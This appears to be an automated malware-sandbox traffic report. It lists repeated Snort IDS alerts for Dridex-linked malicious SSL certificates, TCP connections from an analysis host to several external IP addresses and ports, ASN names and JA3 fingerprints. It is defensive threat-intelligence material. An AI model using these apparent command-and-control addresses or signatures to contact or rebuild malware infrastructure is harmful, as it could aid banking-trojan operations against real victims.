Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49262
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49262
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49264
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49265
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49266
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49266
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49268
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49269
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49270
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49270
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49272
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49273
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49274
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49274
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49276
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49277
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49278
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49278
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49280
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49281
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49282
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49282
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49284
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49285
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49286
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49286
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49288
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49289
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49290
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49290
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49292
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49293
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49294
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49294
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49296
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49297
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49298
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49298
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49300
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49301
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49302
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49302
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49304
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49305
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49306
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49306
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49308
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49309
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49310
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49310
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49312
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49313
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49314
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49314
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49316
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49317
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49318
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49318
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49320
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49321
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49322
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49322
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49324
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49325
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49326
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49326
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49328
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49329
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49330
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49330
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49332
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49333
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49334
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49334
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49336
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49337
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49338
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49338
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49340
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49341
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49342
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49342
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49344
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49345
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49346
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49346
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49348
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49349
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49350
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49350
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49352
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49353
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49354
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49354
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49356
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49357
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49358
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49358
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49360
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49361
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49362
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49362
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49364
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49365
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49366
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49366
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49368
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49369
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49370
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49370
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49372
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49373
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49374
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49374
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49376
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49377
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49378
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49378
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49380
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49381
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49382
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49382
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49384
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49385
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49386
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49386
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49388
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49389
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49390
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49390
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49392
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49393
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49394
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49394
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49396
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49397
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49398
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49398
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49400
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49401
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49402
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49402
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49404
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49405
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49406
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49406
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49408
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49409
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49410
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49410

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 80.86.91.27:3308
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 5.100.228.233:3389
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 46.105.131.65:1512

Source: Joe Sandbox View	IP Address: 5.100.228.233 5.100.228.233
Source: Joe Sandbox View	IP Address: 80.86.91.27 80.86.91.27
Source: Joe Sandbox View	IP Address: 46.105.131.65 46.105.131.65

Source: Joe Sandbox View	ASN Name: SENTIANL SENTIANL
Source: Joe Sandbox View	ASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE

Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87

Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
